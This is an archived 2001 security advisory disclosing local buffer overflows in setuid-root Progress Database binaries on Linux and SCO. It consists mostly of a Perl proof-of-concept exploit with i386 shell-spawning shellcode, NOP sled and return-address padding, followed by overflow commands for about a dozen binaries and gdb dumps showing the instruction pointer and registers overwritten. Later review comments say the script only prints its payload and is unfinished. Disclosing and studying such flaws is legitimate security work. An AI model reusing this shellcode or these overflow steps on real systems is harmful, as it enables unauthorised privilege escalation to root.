progress-db.txt

2001-01-31T00:00:00
ID PACKETSTORM:24168
Type packetstorm
Reporter Krfinisterre
Modified 2001-01-31T00:00:00

Description

                                        
Vendor: www.progress.com  
Issue: Local overflows in Progress Database server 8.x and 9.x on Unix (Linux,  
SCO and possibly others)  
NT versions MAY not be affected (tested versions 7, 8 and 9)  
  
Several overflows are present in your software ... if I can overwrite the  
eip on the stack I can run arbitrary code as root via your program ... thus  
circumventing my user privileges to gain root. My test exploit is attached  
below (a work in progress) along with examples of gdb output and the  
program crashes  
  
  
#!/usr/bin/perl  
# Progress 8 and 9 test exploit code  
# Proof of concept by krfinisterre@checkfree.com  
#
# NOTE(review): what this script actually does is build one string
# ($buffer = run of $nop . $shellcode . repeated $new_ret) and print it
# with `echo -e`; it never invokes a Progress binary itself. The advisory
# text above calls it a work in progress. The length and address values
# below are the author's and are not verified anywhere on this page.
  
$len = 481; # Sufficient to overwrite the return value.  
            # NOTE(review): total byte length of $buffer. The gdb
            # transcripts further down report different lengths for the
            # various binaries; which target this value corresponds to is
            # not stated.
$nop = "\x90";  # single byte the sled loop below repeats
$ret = 0xbfffe208; # Return Value / ESP / Stack Pointer.  
                   # Base address chosen by the author; the offset given
                   # on the command line is added to it below.
  
# i386 shellcode, reproduced exactly as the author supplied it; not
# annotated here.
$shellcode=  
"\x89\xe6".  
"\x83\xc6\x30".  
"\xb8\x2e\x62\x69\x6e".  
"\x40".  
"\x89\x06".  
"\xb8\x2e\x73\x68\x21".  
"\x40".  
"\x89\x46\x04".  
"\x29\xc0".  
"\x88\x46\x07".  
"\x89\x76\x08".  
"\x89\x46\x0c".  
"\xb0\x0b".  
"\x87\xf3".  
"\x8d\x4b\x08".  
"\x8d\x53\x0c".  
"\xcd\x80";  
  
  
# Usage: exactly one argument, an offset that is added to $ret.
if (@ARGV < 1) {  
print("Usage: $0 <offset>\n");  
exit(1);  
}  
  
( $offset) = @ARGV;  
  
# First segment: repeat $nop until $len - length($shellcode) - 100 bytes,
# leaving room for the shellcode plus roughly 100 bytes of address copies.
for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {  
$buffer .= $nop;  
}  
  
$buffer .= $shellcode;  
# pack 'l' is a native-endian signed 32-bit value; every transcript on
# this page is i386, so little-endian there.
$new_ret = pack('l', ($ret + $offset));  
  
# Hex rendering of the chosen address. NOTE(review): assigned but never
# read again in this script (only $new_ret is emitted).
$address = sprintf('%lx', ($ret + $offset));  
  
# $i carries over from the first loop; advance it past the shellcode and
# pad the remainder of $len with 4-byte copies of $new_ret.
for ($i += length($shellcode); $i < $len; $i += 4) {  
$buffer .= $new_ret;  
}  
  
# A leading "a " word precedes the buffer; the page does not explain why.
$exploit_string = "a $buffer";  
  
# Only writes the assembled string to stdout via the shell and echo -e;
# nothing on this page shows it being fed to a Progress binary.
system("echo -e \"$exploit_string\"");  
  
----------------------------------------------  
  
# gdb /usr/dlc/bin/_mpros core  
Core was generated by `/usr/dlc/bin/_mprosrva  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.  
Program terminated with signal 11, Segmentation fault.  
Reading symbols from /lib/libm.so.6...done.  
Loaded symbols for /lib/libm.so.6  
Reading symbols from /lib/libc.so.6...done.  
Loaded symbols for /lib/libc.so.6  
Reading symbols from /lib/ld-linux.so.2...done.  
Loaded symbols for /lib/ld-linux.so.2  
#0 0x42424242 in ?? ()  
(gdb) q  
[root@localhost /root]# /usr/dlc/bin/_mprosrva `perl -e 'print "A" x 5746'  
`BBBB  
BBBB == 0x42424242, i.e. my eip  
  
A buffer of 1143 chars begins overwriting eax; 5746 chars overwrite eip.  
  
(gdb) info registers  
eax 0x80b3c80 134954112  
ecx 0xbffff4f4 -1073744652  
edx 0x480b5e31 1208704561  
ebx 0x1 1  
esp 0xbfffdbc0 0xbfffdbc0  
ebp 0xbfffdbe0 0xbfffdbe0  
esi 0x2 2  
edi 0xbfffdcf4 -1073750796  
eip 0x42424242 0x42424242  
eflags 0x10206 66054  
cs 0x23 35  
ss 0x2b 43  
ds 0x2b 43  
es 0x2b 43  
fs 0x2b 43  
gs 0x2b 43  
fctrl 0x0 0  
fstat 0x0 0  
ftag 0x0 0  
fiseg 0x0 0  
fioff 0x0 0  
foseg 0x0 0  
fooff 0x0 0  
fop 0x0 0  
  
  
Below are several more examples.  
  
# uname -a  
SCO_SV scosysv 3.2 5.0.5 i386  
# ls -al /usr/dlc/bin/proserve  
-rwxr-xr-x 1 root sys 2708 Jan 9 15:29 /usr/dlc/bin/proserve  
# /usr/dlc/bin/proserve `perl -e 'print "A" x 3000'`  
PROGRESS Version 9.1B as of Sun Dec 3 20:27:14 EST 2000  
Memory fault - core dumped  
#  
  
------------------  
  
/usr/dlc/bin/_mprshut `perl -e 'print "A" x 2000'`  
Memory fault - core dumped  
  
-----------------------------------  
  
/usr/dlc/bin/_mprosrv `perl -e 'print "A" x 2000'`  
Memory fault - core dumped  
  
-------------------  
  
/usr/dlc/bin/_probuild a `perl -e 'print "A" x 2000'`  
Memory fault - core dumped  
  
--------------------  
  
/usr/dlc/bin/prodb a `perl -e 'print "A" x 2000'`  
Memory fault - core dumped  
  
  
Below this line, everything is version 8.3b. Note that the binaries listed are setuid root (the `s` in `-rwsrwxr-x`), which is why an overflow in any of them runs code as root rather than as the invoking user.  
  
-rwsrwxr-x 1 root root 508151 Nov 10 1999  
/usr/dlc/bin/_dbutil*  
-rwsrwxr-x 1 root root 557075 Nov 10 1999  
/usr/dlc/bin/_mprosrv*  
-rwsrwxr-x 1 root root 561294 Nov 10 1999  
/usr/dlc/bin/_mprosrva*  
-rwsrwxr-x 1 root root 604635 Nov 10 1999  
/usr/dlc/bin/_mprshut*  
-rwsrwxr-x 1 root root 2574331 Nov 10 1999  
/usr/dlc/bin/_probuild*  
-rwsrwxr-x 1 root root 2986163 Nov 10 1999  
/usr/dlc/bin/_progres*  
-rwsrwxr-x 1 root root 2924760 Nov 10 1999  
/usr/dlc/bin/_progresa*  
-rwsrwxr-x 1 root root 971209 Nov 10 1999  
/usr/dlc/bin/_proutil*  
-rwsrwxr-x 1 root root 686582 Nov 10 1999  
/usr/dlc/bin/_rfutil*  
-rwsrwxr-x 1 root root 122260 Nov 10 1999 /usr/dlc/bin/prodb*  
-rwsrwxr-x 1 root root 134337 Nov 10 1999  
/usr/dlc/bin/prolib*  
  
[root@localhost /root]# /usr/dlc/bin/prolib library-name `perl -e 'print  
"A" x 2000'`  
Invalid prolib command  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
  
Segmentation fault (core dumped)  
[root@localhost /root]# gdb /usr/dlc/bin/prolib core  
GNU gdb 5.0  
Copyright 2000 Free Software Foundation, Inc.  
GDB is free software, covered by the GNU General Public License, and you  
are  
welcome to change it and/or distribute copies of it under certain  
conditions.  
Type "show copying" to see the conditions.  
There is absolutely no warranty for GDB. Type "show warranty" for details.  
This GDB was configured as "i586-mandrake-linux"...  
Core was generated by `/usr/dlc/bin/prolib library-name  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.  
Program terminated with signal 11, Segmentation fault.  
Reading symbols from /lib/libm.so.6...done.  
Loaded symbols for /lib/libm.so.6  
Reading symbols from /lib/libc.so.6...done.  
Loaded symbols for /lib/libc.so.6  
Reading symbols from /lib/ld-linux.so.2...done.  
Loaded symbols for /lib/ld-linux.so.2  
Reading symbols from /lib/libnss_files.so.2...done.  
Loaded symbols for /lib/libnss_files.so.2  
#0 0x41414141 in ?? ()  
  
---------------------------------------------------------------  
  
[root@localhost /root]# /usr/dlc/bin/_probuild sports `perl -e 'print "A" x  
1200'`  
Segmentation fault (core dumped)  
[root@localhost /root]# gdb /usr/dlc/bin/_probuild core  
GNU gdb 5.0  
Copyright 2000 Free Software Foundation, Inc.  
GDB is free software, covered by the GNU General Public License, and you  
are  
welcome to change it and/or distribute copies of it under certain  
conditions.  
Type "show copying" to see the conditions.  
There is absolutely no warranty for GDB. Type "show warranty" for details.  
This GDB was configured as "i586-mandrake-linux"...  
Core was generated by `/usr/dlc/bin/_probuild sports  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.  
Program terminated with signal 11, Segmentation fault.  
#0 0x400905c7 in ?? ()  
(gdb) info register eax  
eax 0x41414141 1094795585  
(gdb)  
  
  
---------------------------------------------------------------------  
  
[root@localhost /root]# /usr/dlc/bin/_progres sports `perl -e 'print "A" x  
1200'`  
Segmentation fault (core dumped)  
  
[root@localhost /root]# gdb /usr/dlc/bin/_progres core  
GNU gdb 5.0  
Copyright 2000 Free Software Foundation, Inc.  
GDB is free software, covered by the GNU General Public License, and you  
are  
welcome to change it and/or distribute copies of it under certain  
conditions.  
Type "show copying" to see the conditions.  
There is absolutely no warranty for GDB. Type "show warranty" for details.  
This GDB was configured as "i586-mandrake-linux"...  
Core was generated by `/usr/dlc/bin/_progres sports  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.  
Program terminated with signal 11, Segmentation fault.  
#0 0x400905c7 in ?? ()  
(gdb) info register eax  
eax 0x41414141 1094795585  
(gdb)  
  
------------------------------------------------------------------  
  
[root@localhost /root]# /usr/dlc/bin/_progresa sports `perl -e 'print "A" x  
4200'`  
Segmentation fault (core dumped)  
[root@localhost /root]# gdb /usr/dlc/bin/_progresa core  
GNU gdb 5.0  
Copyright 2000 Free Software Foundation, Inc.  
GDB is free software, covered by the GNU General Public License, and you  
are  
welcome to change it and/or distribute copies of it under certain  
conditions.  
Type "show copying" to see the conditions.  
There is absolutely no warranty for GDB. Type "show warranty" for details.  
This GDB was configured as "i586-mandrake-linux"...  
Core was generated by `/usr/dlc/bin/_progresa sports  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.  
Program terminated with signal 11, Segmentation fault.  
#0 0x40090590 in ?? ()  
(gdb) info register eax  
eax 0x41414141 1094795585  
  
--------------------------------------------------------------------  
  
[root@localhost /root]# /usr/dlc/bin/_dbutil prorest sports `perl -e 'print  
"A"  
x 4200'`  
** Cannot find or open file  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)#w:)  
#w:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
  
SYSTEM ERROR: Memory violation. (49)  
** Save file named core for analysis by Progress Software Corporation.  
(439)  
Quit (core dumped)  
  
  
[root@localhost /root]# gdb /usr/dlc/bin/_dbutil core  
GNU gdb 5.0  
Copyright 2000 Free Software Foundation, Inc.  
GDB is free software, covered by the GNU General Public License, and you  
are  
welcome to change it and/or distribute copies of it under certain  
conditions.  
Type "show copying" to see the conditions.  
There is absolutely no warranty for GDB. Type "show warranty" for details.  
This GDB was configured as "i586-mandrake-linux"...  
Core was generated by `/usr/dlc/bin/_dbutil prorest sports  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.  
Program terminated with signal 3, Quit.  
Reading symbols from /lib/libm.so.6...done.  
Loaded symbols for /lib/libm.so.6  
Reading symbols from /lib/libc.so.6...done.  
Loaded symbols for /lib/libc.so.6  
Reading symbols from /lib/ld-linux.so.2...done.  
Loaded symbols for /lib/ld-linux.so.2  
Reading symbols from /lib/libnss_files.so.2...done.  
Loaded symbols for /lib/libnss_files.so.2  
#0 0x400590d1 in kill () from /lib/libc.so.6  
(gdb) info register edi  
edi 0x41414141 1094795585  
  
  
-----------------------------------------------------------  
  
[root@localhost /root]# /usr/dlc/bin/_proutil sports `perl -e 'print "A" x  
4200'`  
Segmentation fault (core dumped)  
[root@localhost /root]# gdb /usr/dlc/bin/_proutil core  
GNU gdb 5.0  
Copyright 2000 Free Software Foundation, Inc.  
GDB is free software, covered by the GNU General Public License, and you  
are  
welcome to change it and/or distribute copies of it under certain  
conditions.  
Type "show copying" to see the conditions.  
There is absolutely no warranty for GDB. Type "show warranty" for details.  
This GDB was configured as "i586-mandrake-linux"...  
Core was generated by `/usr/dlc/bin/_proutil sports  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.  
Program terminated with signal 11, Segmentation fault.  
#0 0x40090590 in ?? ()  
  
(gdb) info register eax  
eax 0x41414141 1094795585  
  
-------------------------------------------------------------  
[root@localhost /root]# /usr/dlc/bin/_rfutil sports `perl -e 'print "A" x  
4200'`  
Segmentation fault (core dumped)  
[root@localhost /root]# gdb /usr/dlc/bin/_rfutil core  
GNU gdb 5.0  
Copyright 2000 Free Software Foundation, Inc.  
GDB is free software, covered by the GNU General Public License, and you  
are  
welcome to change it and/or distribute copies of it under certain  
conditions.  
Type "show copying" to see the conditions.  
There is absolutely no warranty for GDB. Type "show warranty" for details.  
This GDB was configured as "i586-mandrake-linux"...  
Core was generated by `/usr/dlc/bin/_rfutil sports  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.  
Program terminated with signal 11, Segmentation fault.  
#0 0x400905ad in ?? ()  
  
(gdb) info register eax  
eax 0x41414141 1094795585  
  
--------------------------------------------------------------  
  
[root@localhost /root]# /usr/dlc/bin/prodb sports `perl -e 'print "A" x  
4200'`  
  
The database name is too long.  
Segmentation fault (core dumped)  
[root@localhost /root]# gdb /usr/dlc/bin/prodb core  
GNU gdb 5.0  
Copyright 2000 Free Software Foundation, Inc.  
GDB is free software, covered by the GNU General Public License, and you  
are  
welcome to change it and/or distribute copies of it under certain  
conditions.  
Type "show copying" to see the conditions.  
There is absolutely no warranty for GDB. Type "show warranty" for details.  
This GDB was configured as "i586-mandrake-linux"...  
Core was generated by `AAAAAAAAAAAAAAAAAAAAAAAAAAAA/.db.bi.tl.lg.lk  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.  
Program terminated with signal 11, Segmentation fault.  
Reading symbols from /lib/libc.so.6...done.  
Loaded symbols for /lib/libc.so.6  
Reading symbols from /lib/ld-linux.so.2...done.  
Loaded symbols for /lib/ld-linux.so.2  
#0 0x41414141 in ?? ()  
  
(gdb) info register eip  
eip 0x41414141 0x41414141  
  
  
-----------------------------------------------------------------  
[root@localhost /root]# /usr/dlc/bin/_mprosrv sports `perl -e 'print "A" x  
4200'`  
Segmentation fault (core dumped)  
[root@localhost /root]# gdb /usr/dlc/bin/_mprosrv core  
GNU gdb 5.0  
Copyright 2000 Free Software Foundation, Inc.  
GDB is free software, covered by the GNU General Public License, and you  
are  
welcome to change it and/or distribute copies of it under certain  
conditions.  
Type "show copying" to see the conditions.  
There is absolutely no warranty for GDB. Type "show warranty" for details.  
This GDB was configured as "i586-mandrake-linux"...  
Core was generated by `/usr/dlc/bin/_mprosrv sports  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.  
Program terminated with signal 11, Segmentation fault.  
#0 0x40090590 in ?? ()  
(gdb) info register eax  
eax 0x41414141 1094795585  
------------------------------------------------------------------  
  
[root@localhost /root]# /usr/dlc/bin/_mprosrva sports `perl -e 'print "A"  
x 4200'`  
Segmentation fault (core dumped)  
[root@localhost /root]# gdb /usr/dlc/bin/_mprosrva core  
GNU gdb 5.0  
Copyright 2000 Free Software Foundation, Inc.  
GDB is free software, covered by the GNU General Public License, and you  
are  
welcome to change it and/or distribute copies of it under certain  
conditions.  
Type "show copying" to see the conditions.  
There is absolutely no warranty for GDB. Type "show warranty" for details.  
This GDB was configured as "i586-mandrake-linux"...  
Core was generated by `/usr/dlc/bin/_mprosrva sports  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.  
Program terminated with signal 11, Segmentation fault.  
#0 0x40090590 in ?? ()  
(gdb) info register eax  
eax 0x41414141 1094795585  
  
---------------------------------------------------------------  
[root@localhost /root]# /usr/dlc/bin/_mprshut sports `perl -e 'print "A" x  
4200'`  
Segmentation fault (core dumped)  
[root@localhost /root]# gdb /usr/dlc/bin/_mprshut core  
GNU gdb 5.0  
Copyright 2000 Free Software Foundation, Inc.  
GDB is free software, covered by the GNU General Public License, and you  
are  
welcome to change it and/or distribute copies of it under certain  
conditions.  
Type "show copying" to see the conditions.  
There is absolutely no warranty for GDB. Type "show warranty" for details.  
This GDB was configured as "i586-mandrake-linux"...  
Core was generated by `/usr/dlc/bin/_mprshut sports  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.  
Program terminated with signal 11, Segmentation fault.  
#0 0x40090590 in ?? ()  
(gdb) info register eax  
eax 0x41414141 1094795585  
(gdb)  
  
------------------------------------------------------------------------  
  
  
  